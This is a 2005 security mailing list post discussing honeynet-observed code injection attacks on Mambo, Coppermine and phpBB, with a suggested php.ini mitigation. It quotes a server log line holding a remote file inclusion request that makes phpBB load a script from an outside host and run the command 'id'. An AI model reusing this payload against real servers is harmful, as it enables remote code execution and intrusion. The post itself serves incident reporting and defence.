WebApp Sec mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Mambo, Coppermine and PHPBB Attacks

From: Paul Laudanski <zx () castlecops com>
Date: Mon, 19 Dec 2005 18:24:14 -0500 (EST)
On Mon, 19 Dec 2005, Mark Ryan del Moral Talabis wrote:


Our honeynet has been picking up an increase in the number of code
injection attacks in the past few days. Attacks are primarily directed
to several popular open source applications: Mambo, Coppermine and
PHPBB.

Analysis:
http://www.philippinehoneynet.org/dataarchive.php?date=2005-12-17


Nice catch.  I checked my logs and found these which appear to be the 
valid phpbb injection request:

81.215.110.24 - - [19/Dec/2005:07:20:30 -0500] "GET 
/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.frauenfinanzzentrum.at/tool25.dat?&cmd=id HTTP/1.0"

Notice the admin_styles.php is written out once.  I would suspect that 
disabling allow_url_fopen directive in php.ini would disallow such a 
request to execute.  This would prevent resources other than files to not 
be included.  But I haven't tested.

-- 
Paul Laudanski, Microsoft MVP Windows-Security
[cal] http://events.castlecops.com
[de] http://de.castlecops.com
[en] http://castlecops.com
[wiki] http://wiki.castlecops.com
[family] http://cuddlesnkisses.com
Previous By Date Next
Previous By Thread Next

Current thread: